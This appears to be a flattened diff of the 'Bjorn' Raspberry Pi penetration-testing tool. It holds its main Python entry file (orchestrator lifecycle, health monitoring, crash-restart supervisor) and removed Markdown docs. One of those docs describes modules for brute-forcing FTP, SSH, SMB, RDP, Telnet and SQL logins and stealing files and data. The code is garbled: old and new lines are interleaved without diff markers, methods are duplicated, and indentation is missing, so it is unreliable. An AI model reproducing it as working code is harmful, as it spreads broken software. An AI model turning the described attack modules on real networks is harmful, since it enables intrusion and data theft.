from runtime_state_updater import RuntimeStateUpdater
from webapp import web_thread
logger = Logger(name="Bjorn.py", level=logging.DEBUG)
_shutdown_lock = threading.Lock()
_shutdown_started = False
_instance_lock_fd = None
_instance_lock_path = "/tmp/bjorn_160226.lock"
try:
import fcntl
except Exception:
fcntl = None
def _release_instance_lock():
global _instance_lock_fd
if _instance_lock_fd is None:
return
try:
if fcntl is not None:
try:
fcntl.flock(_instance_lock_fd.fileno(), fcntl.LOCK_UN)
except Exception:
pass
_instance_lock_fd.close()
except Exception:
pass
_instance_lock_fd = None
def _acquire_instance_lock() -> bool:
"""Ensure only one Bjorn_160226 process can run at once."""
global _instance_lock_fd
if _instance_lock_fd is not None:
return True
try:
fd = open(_instance_lock_path, "a+", encoding="utf-8")
except Exception as exc:
logger.error(f"Unable to open instance lock file {_instance_lock_path}: {exc}")
return True
if fcntl is None:
_instance_lock_fd = fd
return True
try:
fcntl.flock(fd.fileno(), fcntl.LOCK_EX | fcntl.LOCK_NB)
fd.seek(0)
fd.truncate()
fd.write(str(os.getpid()))
fd.flush()
except OSError:
try:
fd.seek(0)
owner_pid = fd.read().strip() or "unknown"
except Exception:
owner_pid = "unknown"
logger.critical(f"Another Bjorn instance is already running (pid={owner_pid}).")
try:
fd.close()
except Exception:
pass
return False
_instance_lock_fd = fd
return True
class HealthMonitor(threading.Thread):
"""Periodic runtime health logger (threads/fd/rss/queue/epd metrics)."""
def __init__(self, shared_data_, interval_s: int = 60):
super().__init__(daemon=True, name="HealthMonitor")
self.shared_data = shared_data_
self.interval_s = max(10, int(interval_s))
self._stop_event = threading.Event()
self._tm_prev_snapshot = None
self._tm_last_report = 0.0
def stop(self):
self._stop_event.set()
def _fd_count(self) -> int:
try:
return len(os.listdir("/proc/self/fd"))
except Exception:
return -1
def _rss_kb(self) -> int:
try:
with open("/proc/self/status", "r", encoding="utf-8") as fh:
for line in fh:
if line.startswith("VmRSS:"):
parts = line.split()
if len(parts) >= 2:
return int(parts[1])
except Exception:
pass
return -1
def _queue_counts(self):
pending = running = scheduled = -1
try:
# Using query_one safe method from database
row = self.shared_data.db.query_one(
"""
SELECT
SUM(CASE WHEN status='pending' THEN 1 ELSE 0 END) AS pending,
SUM(CASE WHEN status='running' THEN 1 ELSE 0 END) AS running,
SUM(CASE WHEN status='scheduled' THEN 1 ELSE 0 END) AS scheduled
FROM action_queue
"""
)
if row:
pending = int(row.get("pending") or 0)
running = int(row.get("running") or 0)
scheduled = int(row.get("scheduled") or 0)
except Exception as exc:
logger.error_throttled(
f"Health monitor queue count query failed: {exc}",
key="health_queue_counts",
interval_s=120,
)
return pending, running, scheduled
def run(self):
while not self._stop_event.wait(self.interval_s):
try:
threads = threading.enumerate()
thread_count = len(threads)
top_threads = ",".join(t.name for t in threads[:8])
fd_count = self._fd_count()
rss_kb = self._rss_kb()
pending, running, scheduled = self._queue_counts()
# Lock to safely read shared metrics without race conditions
with self.shared_data.health_lock:
display_metrics = dict(getattr(self.shared_data, "display_runtime_metrics", {}) or {})
epd_enabled = int(display_metrics.get("epd_enabled", 0))
epd_failures = int(display_metrics.get("failed_updates", 0))
epd_reinit = int(display_metrics.get("reinit_attempts", 0))
epd_headless = int(display_metrics.get("headless", 0))
epd_last_success = display_metrics.get("last_success_epoch", 0)
logger.info(
"health "
f"thread_count={thread_count} "
f"rss_kb={rss_kb} "
f"queue_pending={pending} "
f"epd_failures={epd_failures} "
f"epd_reinit={epd_reinit} "
)
# Optional: tracemalloc report (only if enabled via PYTHONTRACEMALLOC or tracemalloc.start()).
try:
if tracemalloc.is_tracing():
now = time.monotonic()
tm_interval = float(self.shared_data.config.get("tracemalloc_report_interval_s", 300) or 300)
if tm_interval > 0 and (now - self._tm_last_report) >= tm_interval:
self._tm_last_report = now
top_n = int(self.shared_data.config.get("tracemalloc_top_n", 10) or 10)
top_n = max(3, min(top_n, 25))
snap = tracemalloc.take_snapshot()
if self._tm_prev_snapshot is not None:
stats = snap.compare_to(self._tm_prev_snapshot, "lineno")[:top_n]
logger.info(f"mem_top (tracemalloc diff, top_n={top_n})")
for st in stats:
logger.info(f"mem_top {st}")
else:
stats = snap.statistics("lineno")[:top_n]
logger.info(f"mem_top (tracemalloc, top_n={top_n})")
for st in stats:
logger.info(f"mem_top {st}")
self._tm_prev_snapshot = snap
except Exception as exc:
logger.error_throttled(
f"Health monitor tracemalloc failure: {exc}",
key="health_tracemalloc_error",
interval_s=300,
)
except Exception as exc:
logger.error_throttled(
f"Health monitor loop failure: {exc}",
key="health_loop_error",
interval_s=120,
)
class Bjorn:
"""Main class for Bjorn. Manages the primary operations of the application."""
def __init__(self, shared_data):
self.shared_data = shared_data
"""Main class for Bjorn. Manages orchestration lifecycle."""
def __init__(self, shared_data_):
self.shared_data = shared_data_
self.commentaire_ia = Commentaireia()
self.orchestrator_thread = None
self.orchestrator = None
self.network_connected = False
self.wifi_connected = False
self.previous_network_connected = None  # Keep track of the previous network state
self.previous_network_connected = None
self._orch_lock = threading.Lock()
self._last_net_check = 0 # Throttling for network scan
self._last_orch_stop_attempt = 0.0
def run(self):
"""Main loop for Bjorn. Waits for Wi-Fi connection and starts Orchestrator."""
# Wait for startup delay if configured in shared data
if hasattr(self.shared_data, 'startup_delay') and self.shared_data.startup_delay > 0:
"""Main loop for Bjorn. Waits for network and starts/stops Orchestrator based on mode."""
if hasattr(self.shared_data, "startup_delay") and self.shared_data.startup_delay > 0:
logger.info(f"Waiting for startup delay: {self.shared_data.startup_delay} seconds")
time.sleep(self.shared_data.startup_delay)
# Main loop to keep Bjorn running
backoff_s = 1.0
while not self.shared_data.should_exit:
if not self.shared_data.manual_mode:
self.check_and_start_orchestrator()
time.sleep(10) # Main loop idle waiting
try:
# Manual/Bifrost mode must stop orchestration.
# BIFROST: WiFi is in monitor mode, no network available for scans.
current_mode = self.shared_data.operation_mode
if current_mode in ("MANUAL", "BIFROST", "LOKI"):
# Avoid spamming stop requests if already stopped.
if self.orchestrator_thread is not None and self.orchestrator_thread.is_alive():
self.stop_orchestrator()
else:
self.check_and_start_orchestrator()
time.sleep(5)
backoff_s = 1.0 # Reset backoff on success
except Exception as exc:
logger.error(f"Bjorn main loop error: {exc}")
logger.error_throttled(
"Bjorn main loop entering backoff due to repeated errors",
key="bjorn_main_loop_backoff",
interval_s=60,
)
time.sleep(backoff_s)
backoff_s = min(backoff_s * 2.0, 30.0)
def check_and_start_orchestrator(self):
"""Check Wi-Fi and start the orchestrator if connected."""
if self.shared_data.operation_mode in ("MANUAL", "BIFROST", "LOKI"):
return
if self.is_network_connected():
self.wifi_connected = True
if self.orchestrator_thread is None or not self.orchestrator_thread.is_alive():
self.start_orchestrator()
else:
self.wifi_connected = False
logger.info("Waiting for Wi-Fi connection to start Orchestrator...")
logger.info_throttled(
"Waiting for network connection to start Orchestrator...",
key="bjorn_wait_network",
interval_s=30,
)
def start_orchestrator(self):
"""Start the orchestrator thread."""
self.is_network_connected() # reCheck if Wi-Fi is connected before starting the orchestrator
# time.sleep(10) # Wait for network to stabilize
if self.wifi_connected: # Check if Wi-Fi is connected before starting the orchestrator
if self.orchestrator_thread is None or not self.orchestrator_thread.is_alive():
logger.info("Starting Orchestrator thread...")
self.shared_data.orchestrator_should_exit = False
self.shared_data.manual_mode = False
self.orchestrator = Orchestrator()
self.orchestrator_thread = threading.Thread(target=self.orchestrator.run)
self.orchestrator_thread.start()
logger.info("Orchestrator thread started, automatic mode activated.")
else:
logger.info("Orchestrator thread is already running.")
else:
pass
def stop_orchestrator(self):
"""Stop the orchestrator thread."""
self.shared_data.manual_mode = True
logger.info("Stop button pressed. Manual mode activated & Stopping Orchestrator...")
if self.orchestrator_thread is not None and self.orchestrator_thread.is_alive():
logger.info("Stopping Orchestrator thread...")
self.shared_data.orchestrator_should_exit = True
self.orchestrator_thread.join()
logger.info("Orchestrator thread stopped.")
self.shared_data.bjorn_orch_status = "IDLE"
self.shared_data.bjorn_status_text2 = ""
self.shared_data.manual_mode = True
else:
logger.info("Orchestrator thread is not running.")
with self._orch_lock:
# Re-check network inside lock
if not self.network_connected:
return
if self.orchestrator_thread is not None and self.orchestrator_thread.is_alive():
logger.debug("Orchestrator thread is already running.")
return
logger.info("Starting Orchestrator thread...")
self.shared_data.orchestrator_should_exit = False
self.orchestrator = Orchestrator()
self.orchestrator_thread = threading.Thread(
target=self.orchestrator.run,
daemon=True,
name="OrchestratorMain",
)
self.orchestrator_thread.start()
logger.info("Orchestrator thread started.")
def stop_orchestrator(self):
with self._orch_lock:
thread = self.orchestrator_thread
if thread is None or not thread.is_alive():
self.orchestrator_thread = None
self.orchestrator = None
return
# Keep MANUAL sticky so supervisor does not auto-restart orchestration,
# but only if the current mode isn't already handling it.
# - MANUAL/BIFROST: already non-AUTO, no need to change
# - AUTO: let it be — orchestrator will restart naturally (e.g. after Bifrost auto-disable)
try:
current = self.shared_data.operation_mode
if current == "AI":
self.shared_data.operation_mode = "MANUAL"
except Exception:
pass
now = time.time()
if now - self._last_orch_stop_attempt >= 10.0:
logger.info("Stop requested: stopping Orchestrator")
self._last_orch_stop_attempt = now
self.shared_data.orchestrator_should_exit = True
self.shared_data.queue_event.set() # Wake up thread
thread.join(timeout=10.0)
if thread.is_alive():
logger.warning_throttled(
"Orchestrator thread did not stop gracefully",
key="orch_stop_not_graceful",
interval_s=20,
)
# Still reset status so UI doesn't stay stuck on the
# last action while the thread finishes in the background.
else:
self.orchestrator_thread = None
self.orchestrator = None
# Always reset display state regardless of whether join succeeded.
self.shared_data.bjorn_orch_status = "IDLE"
self.shared_data.bjorn_status_text = "IDLE"
self.shared_data.bjorn_status_text2 = ""
self.shared_data.action_target_ip = ""
self.shared_data.active_action = None
self.shared_data.update_status("IDLE", "")
def is_network_connected(self):
"""Checks for network connectivity on eth0 or wlan0 using ip command (replacing deprecated ifconfig)."""
logger = logging.getLogger("Bjorn.py")
"""Checks for network connectivity with throttling and low-CPU checks."""
now = time.time()
# Throttling: Do not scan more than once every 10 seconds
if now - self._last_net_check < 10:
return self.network_connected
self._last_net_check = now
def interface_has_ip(interface_name):
try:
# Use 'ip -4 addr show <interface>' to check for IPv4 address
# OPTIMIZATION: Check /sys/class/net first to avoid spawning subprocess if interface doesn't exist
if not os.path.exists(f"/sys/class/net/{interface_name}"):
return False
# Check for IP address
result = subprocess.run(
['ip', '-4', 'addr', 'show', interface_name],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
text=True
["ip", "-4", "addr", "show", interface_name],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
text=True,
timeout=2,
)
if result.returncode != 0:
return False
# Check if output contains "inet" which indicates an IP address
return 'inet' in result.stdout
return "inet " in result.stdout
except Exception:
return False
eth_connected = interface_has_ip('eth0')
wifi_connected = interface_has_ip('wlan0')
eth_connected = interface_has_ip("eth0")
wifi_connected = interface_has_ip("wlan0")
self.network_connected = eth_connected or wifi_connected
if self.network_connected != self.previous_network_connected:
if self.network_connected:
logger.info(f"Network is connected (eth0={eth_connected}, wlan0={wifi_connected}).")
logger.info(f"Network status changed: Connected (eth0={eth_connected}, wlan0={wifi_connected})")
else:
logger.warning("No active network connections found.")
logger.warning("Network status changed: Connection lost")
self.previous_network_connected = self.network_connected
return self.network_connected
@staticmethod
def start_display():
"""Start the display thread"""
display = Display(shared_data)
display_thread = threading.Thread(target=display.run)
display_thread.start()
return display_thread
def start_display(old_display=None):
# Ensure the previous Display's controller is fully stopped to release frames
if old_display is not None:
try:
old_display.display_controller.stop(timeout=3.0)
except Exception:
pass
def handle_exit(sig, frame, display_thread, bjorn_thread, web_thread):
"""Handles the termination of the main, display, and web threads."""
display = Display(shared_data)
display_thread = threading.Thread(
target=display.run,
daemon=True,
name="DisplayMain",
)
display_thread.start()
return display_thread, display
def _request_shutdown():
"""Signals all threads to stop."""
shared_data.should_exit = True
shared_data.orchestrator_should_exit = True # Ensure orchestrator stops
shared_data.display_should_exit = True # Ensure display stops
shared_data.webapp_should_exit = True # Ensure web server stops
handle_exit_display(sig, frame, display_thread)
if display_thread.is_alive():
display_thread.join()
if bjorn_thread.is_alive():
bjorn_thread.join()
if web_thread.is_alive():
web_thread.join()
logger.info("Main loop finished. Clean exit.")
sys.exit(0)
shared_data.orchestrator_should_exit = True
shared_data.display_should_exit = True
shared_data.webapp_should_exit = True
shared_data.queue_event.set()
def handle_exit(
sig,
frame,
display_thread,
bjorn_thread,
web_thread_obj,
health_thread=None,
runtime_state_thread=None,
from_signal=False,
):
global _shutdown_started
with _shutdown_lock:
if _shutdown_started:
if from_signal:
logger.warning("Forcing exit (SIGINT/SIGTERM received twice)")
os._exit(130)
return
_shutdown_started = True
logger.info(f"Shutdown signal received: {sig}")
_request_shutdown()
# 1. Stop Display (handles EPD cleanup)
try:
handle_exit_display(sig, frame, display_thread)
except Exception:
pass
# 2. Stop Health Monitor
try:
if health_thread and hasattr(health_thread, "stop"):
health_thread.stop()
except Exception:
pass
# 2b. Stop Runtime State Updater
try:
if runtime_state_thread and hasattr(runtime_state_thread, "stop"):
runtime_state_thread.stop()
except Exception:
pass
# 2c. Stop Sentinel Watchdog
try:
engine = getattr(shared_data, 'sentinel_engine', None)
if engine and hasattr(engine, 'stop'):
engine.stop()
except Exception:
pass
# 2d. Stop Bifrost Engine
try:
engine = getattr(shared_data, 'bifrost_engine', None)
if engine and hasattr(engine, 'stop'):
engine.stop()
except Exception:
pass
# 3. Stop Web Server
try:
if web_thread_obj and hasattr(web_thread_obj, "shutdown"):
web_thread_obj.shutdown()
except Exception:
pass
# 4. Join all threads
for thread in (display_thread, bjorn_thread, web_thread_obj, health_thread, runtime_state_thread):
try:
if thread and thread.is_alive():
thread.join(timeout=5.0)
except Exception:
pass
# 5. Close Database (Prevent corruption)
try:
if hasattr(shared_data, "db") and hasattr(shared_data.db, "close"):
shared_data.db.close()
except Exception as exc:
logger.error(f"Database shutdown error: {exc}")
logger.info("Bjorn stopped. Clean exit.")
_release_instance_lock()
if from_signal:
sys.exit(0)
def _install_thread_excepthook():
def _hook(args):
logger.error(f"Unhandled thread exception: {args.thread.name} - {args.exc_type.__name__}: {args.exc_value}")
# We don't force shutdown here to avoid killing the app on minor thread glitches,
# unless it's critical. The Crash Shield will handle restarts.
threading.excepthook = _hook
if __name__ == "__main__":
logger.info("Starting threads")
if not _acquire_instance_lock():
sys.exit(1)
atexit.register(_release_instance_lock)
_install_thread_excepthook()
display_thread = None
display_instance = None
bjorn_thread = None
health_thread = None
runtime_state_thread = None
last_gc_time = time.time()
try:
logger.info("Loading shared data config...")
logger.info("Bjorn Startup: Loading config...")
shared_data.load_config()
logger.info("Starting display thread...")
shared_data.display_should_exit = False # Initialize display should_exit
display_thread = Bjorn.start_display()
logger.info("Starting Runtime State Updater...")
runtime_state_thread = RuntimeStateUpdater(shared_data)
runtime_state_thread.start()
logger.info("Starting Bjorn thread...")
logger.info("Starting Display...")
shared_data.display_should_exit = False
display_thread, display_instance = Bjorn.start_display()
logger.info("Starting Bjorn Core...")
bjorn = Bjorn(shared_data)
shared_data.bjorn_instance = bjorn # Assign the Bjorn instance to shared_data
bjorn_thread = threading.Thread(target=bjorn.run)
shared_data.bjorn_instance = bjorn
bjorn_thread = threading.Thread(target=bjorn.run, daemon=True, name="BjornMain")
bjorn_thread.start()
if shared_data.config["websrv"]:
logger.info("Starting the web server...")
web_thread.start()
if shared_data.config.get("websrv", False):
logger.info("Starting Web Server...")
if not web_thread.is_alive():
web_thread.start()
signal.signal(signal.SIGINT, lambda sig, frame: handle_exit(sig, frame, display_thread, bjorn_thread, web_thread))
signal.signal(signal.SIGTERM, lambda sig, frame: handle_exit(sig, frame, display_thread, bjorn_thread, web_thread))
health_interval = int(shared_data.config.get("health_log_interval", 60))
health_thread = HealthMonitor(shared_data, interval_s=health_interval)
health_thread.start()
except Exception as e:
logger.error(f"An exception occurred during thread start: {e}")
handle_exit_display(signal.SIGINT, None)
sys.exit(1)
# Sentinel watchdog — start if enabled in config
try:
from sentinel import SentinelEngine
sentinel_engine = SentinelEngine(shared_data)
shared_data.sentinel_engine = sentinel_engine
if shared_data.config.get("sentinel_enabled", False):
sentinel_engine.start()
logger.info("Sentinel watchdog started")
else:
logger.info("Sentinel watchdog loaded (disabled)")
except Exception as e:
logger.warning("Sentinel init skipped: %s", e)
# Bifrost engine — start if enabled in config
try:
from bifrost import BifrostEngine
bifrost_engine = BifrostEngine(shared_data)
shared_data.bifrost_engine = bifrost_engine
if shared_data.config.get("bifrost_enabled", False):
bifrost_engine.start()
logger.info("Bifrost engine started")
else:
logger.info("Bifrost engine loaded (disabled)")
except Exception as e:
logger.warning("Bifrost init skipped: %s", e)
# Loki engine — start if enabled in config
try:
from loki import LokiEngine
loki_engine = LokiEngine(shared_data)
shared_data.loki_engine = loki_engine
if shared_data.config.get("loki_enabled", False):
loki_engine.start()
logger.info("Loki engine started")
else:
logger.info("Loki engine loaded (disabled)")
except Exception as e:
logger.warning("Loki init skipped: %s", e)
# LLM Bridge — warm up singleton (starts LaRuche mDNS discovery if enabled)
try:
from llm_bridge import LLMBridge
LLMBridge() # Initialise singleton, kicks off background discovery
logger.info("LLM Bridge initialised")
except Exception as e:
logger.warning("LLM Bridge init skipped: %s", e)
# MCP Server — start if enabled in config
try:
import mcp_server
if shared_data.config.get("mcp_enabled", False):
mcp_server.start()
logger.info("MCP server started")
else:
logger.info("MCP server loaded (disabled — enable via Settings)")
except Exception as e:
logger.warning("MCP server init skipped: %s", e)
# Signal Handlers
exit_handler = lambda s, f: handle_exit(
s,
f,
display_thread,
bjorn_thread,
web_thread,
health_thread,
runtime_state_thread,
True,
)
signal.signal(signal.SIGINT, exit_handler)
signal.signal(signal.SIGTERM, exit_handler)
# --- SUPERVISOR LOOP (Crash Shield) ---
restart_times = []
max_restarts = 5
restart_window_s = 300
logger.info("Bjorn Supervisor running.")
while not shared_data.should_exit:
time.sleep(2) # CPU Friendly polling
now = time.time()
# --- OPTIMIZATION: Periodic Garbage Collection ---
# Forces cleanup of circular references and free RAM every 2 mins
if now - last_gc_time > 120:
gc.collect()
last_gc_time = now
logger.debug("System: Forced Garbage Collection executed.")
# --- CRASH SHIELD: Bjorn Thread ---
if bjorn_thread and not bjorn_thread.is_alive() and not shared_data.should_exit:
restart_times = [t for t in restart_times if (now - t) <= restart_window_s]
restart_times.append(now)
if len(restart_times) <= max_restarts:
logger.warning("Crash Shield: Restarting Bjorn Main Thread")
bjorn_thread = threading.Thread(target=bjorn.run, daemon=True, name="BjornMain")
bjorn_thread.start()
else:
logger.critical("Crash Shield: Bjorn exceeded restart budget. Shutting down.")
_request_shutdown()
break
# --- CRASH SHIELD: Display Thread ---
if display_thread and not display_thread.is_alive() and not shared_data.should_exit:
restart_times = [t for t in restart_times if (now - t) <= restart_window_s]
restart_times.append(now)
if len(restart_times) <= max_restarts:
logger.warning("Crash Shield: Restarting Display Thread")
display_thread, display_instance = Bjorn.start_display(old_display=display_instance)
else:
logger.critical("Crash Shield: Display exceeded restart budget. Shutting down.")
_request_shutdown()
break
# --- CRASH SHIELD: Runtime State Updater ---
if runtime_state_thread and not runtime_state_thread.is_alive() and not shared_data.should_exit:
restart_times = [t for t in restart_times if (now - t) <= restart_window_s]
restart_times.append(now)
if len(restart_times) <= max_restarts:
logger.warning("Crash Shield: Restarting Runtime State Updater")
runtime_state_thread = RuntimeStateUpdater(shared_data)
runtime_state_thread.start()
else:
logger.critical("Crash Shield: Runtime State Updater exceeded restart budget. Shutting down.")
_request_shutdown()
break
# Exit cleanup
if health_thread:
health_thread.stop()
if runtime_state_thread:
runtime_state_thread.stop()
handle_exit(
signal.SIGTERM,
None,
display_thread,
bjorn_thread,
web_thread,
health_thread,
runtime_state_thread,
False,
)
except Exception as exc:
logger.critical(f"Critical bootstrap failure: {exc}")
_request_shutdown()
# Try to clean up anyway
try:
handle_exit(
signal.SIGTERM,
None,
display_thread,
bjorn_thread,
web_thread,
health_thread,
runtime_state_thread,
False,
)
except Exception:
pass
sys.exit(1)
@@ -1,40 +0,0 @@
# 📝 Code of Conduct
## 🤝 Our Commitment
We are committed to fostering an open and welcoming environment for all contributors. As such, everyone who participates in **Bjorn** is expected to adhere to the following code of conduct.
## 🌟 Expected Behavior
- **Respect:** Be respectful of differing viewpoints and experiences.
- **Constructive Feedback:** Provide constructive feedback and be open to receiving it.
- **Empathy and Kindness:** Show empathy and kindness towards other contributors.
- **Respect for Maintainers:** Respect the decisions of the maintainers.
- **Positive Intent:** Assume positive intent in interactions with others.
## 🚫 Unacceptable Behavior
- **Harassment or Discrimination:** Harassment or discrimination in any form.
- **Inappropriate Language or Imagery:** Use of inappropriate language or imagery.
- **Personal Attacks:** Personal attacks or insults.
- **Public or Private Harassment:** Public or private harassment.
## 📢 Reporting Misconduct
If you encounter any behavior that violates this code of conduct, please report it by contacting [bjorn-cyberviking@outlook.com](mailto:bjorn-cyberviking@outlook.com). All complaints will be reviewed and handled appropriately.
## ⚖️ Enforcement
Instances of unacceptable behavior may be addressed by the project maintainers, who are responsible for clarifying and enforcing this code of conduct. Violations may result in temporary or permanent bans from the project and related spaces.
## 🙏 Acknowledgments
This code of conduct is adapted from the [Contributor Covenant, version 2.0](https://www.contributor-covenant.org/version/2/0/code_of_conduct.html).
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.
@@ -1,51 +0,0 @@
# 🤝 Contributing to Bjorn
We welcome contributions to Bjorn! To make sure the process goes smoothly, please follow these guidelines:
## 📋 Code of Conduct
Please note that all participants in our project are expected to follow our [Code of Conduct](#-code-of-conduct). Make sure to review it before contributing.
## 🛠 How to Contribute
1. **Fork the repository**:
Fork the project to your GitHub account using the GitHub interface.
2. **Create a new branch**:
Use a descriptive branch name for your feature or bugfix:
git checkout -b feature/your-feature-name
3. **Make your changes**:
Implement your feature or fix the bug in your branch. Make sure to include tests where applicable and follow coding standards.
4. **Test your changes**:
Run the test suite to ensure your changes don't break any functionality:
- ...
5. **Commit your changes**:
Use meaningful commit messages that explain what you have done:
git commit -m "Add feature/fix: Description of changes"
6. **Push your changes**:
Push your changes to your fork:
git push origin feature/your-feature-name
7. **Submit a Pull Request**:
Create a pull request on the main repository, detailing the changes you've made. Link any issues your changes resolve and provide context.
## 📑 Guidelines for Contributions
- **Lint your code** before submitting a pull request. We use [ESLint](https://eslint.org/) for frontend and [pylint](https://www.pylint.org/) for backend linting.
- Ensure **test coverage** for your code. Uncovered code may delay the approval process.
- Write clear, concise **commit messages**.
Thank you for helping improve Bjorn!
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.
@@ -1,373 +0,0 @@
# 🖲️ Bjorn Development
<p align="center">
<img src="https://github.com/user-attachments/assets/c5eb4cc1-0c3d-497d-9422-1614651a84ab" alt="thumbnail_IMG_0546" width="98">
</p>
## 📚 Table of Contents
- [Design](#-design)
- [Educational Aspects](#-educational-aspects)
- [Disclaimer](#-disclaimer)
- [Extensibility](#-extensibility)
- [Development Status](#-development-status)
- [Project Structure](#-project-structure)
- [Core Files](#-core-files)
- [Actions](#-actions)
- [Data Structure](#-data-structure)
- [Detailed Project Description](#-detailed-project-description)
- [Behaviour of Bjorn](#-behavior-of-bjorn)
- [Running Bjorn](#-running-bjorn)
- [Manual Start](#-manual-start)
- [Service Control](#-service-control)
- [Fresh Start](#-fresh-start)
- [Important Configuration Files](#-important-configuration-files)
- [Shared Configuration](#-shared-configuration-shared_configjson)
- [Actions Configuration](#-actions-configuration-actionsjson)
- [E-Paper Display Support](#-e-paper-display-support)
- [Ghosting Removed](#-ghosting-removed)
- [Development Guidelines](#-development-guidelines)
- [Adding New Actions](#-adding-new-actions)
- [Testing](#-testing)
- [Web Interface](#-web-interface)
- [Project Roadmap](#-project-roadmap)
- [Current Focus](#-future-plans)
- [Future Plans](#-future-plans)
- [License](#-license)
## 🎨 Design
- **Portability**: Self-contained and portable device, ideal for penetration testing.
- **Modularity**: Extensible architecture allowing addition of new actions.
- **Visual Interface**: The e-Paper HAT provides a visual interface for monitoring ongoing actions, displaying results or stats, and interacting with Bjorn.
## 📔 Educational Aspects
- **Learning Tool**: Designed as an educational tool to understand cybersecurity concepts and penetration testing techniques.
- **Practical Experience**: Provides a practical means for students and professionals to familiarize themselves with network security practices and vulnerability assessment tools.
## ✒️ Disclaimer
- **Ethical Use**: This project is strictly for educational purposes.
- **Responsibility**: The author and contributors disclaim any responsibility for misuse of Bjorn.
- **Legal Compliance**: Unauthorized use of this tool for malicious activities is prohibited and may be prosecuted by law.
## 🧩 Extensibility
- **Evolution**: The main purpose of Bjorn is to gain new actions and extend his arsenal over time.
- **Modularity**: Actions are designed to be modular and can be easily extended or modified to add new functionality.
- **Possibilities**: From capturing pcap files to cracking hashes, man-in-the-middle attacks, and more—the possibilities are endless.
- **Contribution**: It's up to the user to develop new actions and add them to the project.
## 🔦 Development Status
- **Project Status**: Ongoing development.
- **Current Version**: Installable via the scripted auto-installer or manually. Not yet packaged with Raspberry Pi OS.
- **Reason**: The project is still in an early stage, requiring further development and debugging.
### 🗂️ Project Structure
```
Bjorn/
├── Bjorn.py
├── comment.py
├── display.py
├── epd_helper.py
├── init_shared.py
├── kill_port_8000.sh
├── logger.py
├── orchestrator.py
├── requirements.txt
├── shared.py
├── utils.py
├── webapp.py
├── __init__.py
├── actions/
│ ├── ftp_connector.py
│ ├── ssh_connector.py
│ ├── smb_connector.py
│ ├── rdp_connector.py
│ ├── telnet_connector.py
│ ├── sql_connector.py
│ ├── steal_files_ftp.py
│ ├── steal_files_ssh.py
│ ├── steal_files_smb.py
│ ├── steal_files_rdp.py
│ ├── steal_files_telnet.py
│ ├── steal_data_sql.py
│ ├── nmap_vuln_scanner.py
│ ├── scanning.py
│ └── __init__.py
├── backup/
│ ├── backups/
│ └── uploads/
├── config/
├── data/
│ ├── input/
│ │ └── dictionary/
│ ├── logs/
│ └── output/
│ ├── crackedpwd/
│ ├── data_stolen/
│ ├── scan_results/
│ ├── vulnerabilities/
│ └── zombies/
└── resources/
└── waveshare_epd/
```
### ⚓ Core Files
#### Bjorn.py
The main entry point for the application. It initializes and runs the main components, including the network scanner, orchestrator, display, and web server.
#### comment.py
Handles generating all the Bjorn comments displayed on the e-Paper HAT based on different themes/actions and statuses.
#### display.py
Manages the e-Paper HAT display, updating the screen with Bjorn character, the dialog/comments, and the current information such as network status, vulnerabilities, and various statistics.
#### epd_helper.py
Handles the low-level interactions with the e-Paper display hardware.
#### logger.py
Defines a custom logger with specific formatting and handlers for console and file logging. It also includes a custom log level for success messages.
#### orchestrator.py
Bjorn's AI: a heuristic engine that orchestrates the different actions, such as network scanning, vulnerability scanning, attacks, and file stealing. It loads and executes actions based on the configuration and updates the status of both the actions and Bjorn.
#### shared.py
Defines the `SharedData` class that holds configuration settings, paths, and methods for updating and managing shared data across different modules.
#### init_shared.py
Initializes shared data that is used across different modules. It loads the configuration and sets up necessary paths and variables.
#### utils.py
Contains utility functions used throughout the project.
#### webapp.py
Sets up and runs a web server to provide a web interface for changing settings, monitoring and interacting with Bjorn.
### ▶️ Actions
#### actions/scanning.py
Conducts network scanning to identify live hosts and open ports. It updates the network knowledge base (`netkb`) and generates scan results.
#### actions/nmap_vuln_scanner.py
Performs vulnerability scanning using Nmap. It parses the results and updates the vulnerability summary for each host.
#### Protocol Connectors
- **ftp_connector.py**: Brute-force attacks on FTP services.
- **ssh_connector.py**: Brute-force attacks on SSH services.
- **smb_connector.py**: Brute-force attacks on SMB services.
- **rdp_connector.py**: Brute-force attacks on RDP services.
- **telnet_connector.py**: Brute-force attacks on Telnet services.
- **sql_connector.py**: Brute-force attacks on SQL services.
#### File Stealing Modules
- **steal_files_ftp.py**: Steals files from FTP servers.
- **steal_files_smb.py**: Steals files from SMB shares.
- **steal_files_ssh.py**: Steals files from SSH servers.
- **steal_files_telnet.py**: Steals files from Telnet servers.
- **steal_data_sql.py**: Extracts data from SQL databases.
### 📇 Data Structure
#### Network Knowledge Base (netkb.csv)
Located at `data/netkb.csv`. Stores information about:
- Known hosts and their status. (Alive or offline)
- Open ports and vulnerabilities.
- Action execution history. (Success or failed)
**Preview Example:**
![netkb1](https://github.com/infinition/Bjorn/assets/37984399/f641a565-2765-4280-a7d7-5b25c30dcea5)
![netkb2](https://github.com/infinition/Bjorn/assets/37984399/f08114a2-d7d1-4f50-b1c4-a9939ba66056)
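Since `netkb.csv` is a plain CSV file, it can be inspected with the standard library. A minimal sketch — the column names used here (`IPs`, `Alive`) are assumptions for illustration; check the header row of your own `data/netkb.csv`:

```python
# Iterate over live hosts in netkb.csv. The column names ("IPs", "Alive")
# are illustrative assumptions; adjust them to match the actual header row.
import csv

def alive_hosts(netkb_path):
    """Yield rows of netkb.csv whose Alive flag is set."""
    with open(netkb_path, newline="") as fh:
        for row in csv.DictReader(fh):
            if row.get("Alive") == "1":
                yield row
```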
#### Scan Results
Located in `data/output/scan_results/`.
A new file is generated every time the network is scanned. It is used to consolidate the data and update `netkb`.
**Example:**
![Scan result](https://github.com/infinition/Bjorn/assets/37984399/eb4a313a-f90c-4c43-b699-3678271886dc)
#### Live Status (livestatus.csv)
Contains real-time information displayed on the e-Paper HAT:
- Total number of known hosts.
- Currently alive hosts.
- Open ports count.
- Other runtime statistics.
## 📖 Detailed Project Description
### 👀 Behavior of Bjorn
Once launched, Bjorn performs the following steps:
1. **Initialization**: Loads configuration, initializes shared data, and sets up necessary components such as the e-Paper HAT display.
2. **Network Scanning**: Scans the network to identify live hosts and open ports. Updates the network knowledge base (`netkb`) with the results.
3. **Orchestration**: Orchestrates different actions based on the configuration and network knowledge base. This includes performing vulnerability scanning, attacks, and file stealing.
